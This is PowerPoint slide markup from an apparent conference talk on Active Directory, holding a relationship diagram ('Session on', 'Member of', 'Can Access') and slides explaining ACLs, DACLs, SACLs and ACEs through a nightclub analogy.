              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB0D2ACD-C48C-44C2-86AB-3877577A44C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7600435" y="2794280"/>
            <a:ext cx="1987861" cy="747287"/>
          </a:xfrm>
          <a:prstGeom prst="star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t>SqlAdmins</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Oval 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB3F2409-76C9-4308-835C-ED291082A032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746761" y="3211980"/>
            <a:ext cx="1153399" cy="8433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John</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B704972E-E133-41D9-8B3A-F6AE024B9399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="6"/>
            <a:endCxn id="25" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="1558142"/>
            <a:ext cx="1378998" cy="6231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94A3E066-4910-4F96-BEA7-BDC498C7EFA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="4"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1108146" y="1979831"/>
            <a:ext cx="510466" cy="8363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220DDEEB-1F37-47F7-BAB9-E3D49B32BD15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="20" idx="0"/>
            <a:endCxn id="6" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1393637" y="3563449"/>
            <a:ext cx="224975" cy="8755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D5B2B314-E97D-4252-A723-9EF1556CECBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="22" idx="2"/>
            <a:endCxn id="25" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3709386" y="2181270"/>
            <a:ext cx="1228150" cy="480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EFB2CE59-44F2-4EE3-930B-9C9B1435CFD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="29" idx="1"/>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3335743" y="2554913"/>
            <a:ext cx="579929" cy="7805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Oval 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC466088-627C-4639-BD4B-757E91638695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5620376" y="4364521"/>
            <a:ext cx="1153399" cy="8433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Mary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Straight Arrow Connector 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299249C8-B523-4D5D-815C-FC6381869D5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="23" idx="2"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8832576" y="5159854"/>
            <a:ext cx="1350405" cy="893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ED0336BD-E128-412E-B5FE-408B872942EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8458933" y="3526812"/>
            <a:ext cx="135432" cy="12593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553C072D-CF00-493A-A8E2-E3F798363998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4023634" y="4918229"/>
            <a:ext cx="1596744" cy="7113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43C98AFE-8F5D-4B6E-B73E-D8CABFD268D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="29" idx="3"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3649991" y="3931848"/>
            <a:ext cx="265681" cy="13240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2BD366A5-6CE4-488D-9039-23BFA8C59463}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6707497" y="3526812"/>
            <a:ext cx="1377792" cy="102125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38BB425F-8A90-49AC-A4FE-698505C6148C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="3971845"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68E4F993-C545-4388-BAA6-B9F3FC3F05A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="183374" y="2213330"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="TextBox 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E7A9FA-F3CF-4BE7-A3C2-3D5112F47027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962614" y="1576250"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF289988-DBBF-426B-B022-44C77A294621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3475896" y="2679849"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="TextBox 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31046626-8119-4EDD-9968-699815511B90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775519" y="1760916"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52E7AF95-D51B-481B-B676-88C74B7A177F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3775519" y="4333751"/>
            <a:ext cx="1416867" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81F4BFB-6AA8-43D3-A191-097A6F8A6D69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413703" y="5301606"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC7D4DD1-C36B-4D30-BC95-6DA41FF81AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189993" y="3576335"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Member of</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="TextBox 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5037F64D-DB5D-441B-9B7E-38E7BBB331E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458932" y="3870692"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="71" name="Straight Arrow Connector 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08E9769F-990A-494F-A77B-6612E4C1FAAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="42" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6604864" y="5084389"/>
            <a:ext cx="1419712" cy="986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DD87F1C6-E23C-40CE-AB91-E468FE21A52C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6511395" y="5116940"/>
            <a:ext cx="1626840" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="TextBox 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FD1A6D-499B-487B-94BB-944448D3A82B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8893289" y="5396877"/>
            <a:ext cx="1416867" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session on</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D7ED58F-C0CF-4112-BB26-650A82495877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296425954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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLUB AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC40EA16-BC5E-4C88-9029-73DB053D125D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209855" y="1220340"/>
            <a:ext cx="5790016" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ACL - bouncer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DACL - clipboard with names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SACL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - VIP’s list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEDC034F-6DA9-4D71-A573-A6B0019FD618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5824025" y="816013"/>
            <a:ext cx="6331138" cy="5762164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Arrow: Left 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0817C650-6590-4318-8C9B-BB58AD24E0BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8534321" y="3255392"/>
            <a:ext cx="1086391" cy="173608"/>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878C9E4D-8A41-4BA5-B299-1050E81B9588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10035706" y="95157"/>
            <a:ext cx="2073436" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defconparties</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119170097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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="0"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CLUB AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC40EA16-BC5E-4C88-9029-73DB053D125D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209855" y="1220340"/>
            <a:ext cx="5790016" cy="1815882"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ACL - bouncer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DACL - clipboard with names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SACL - VIP’s list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ACEs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - the names on the list</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
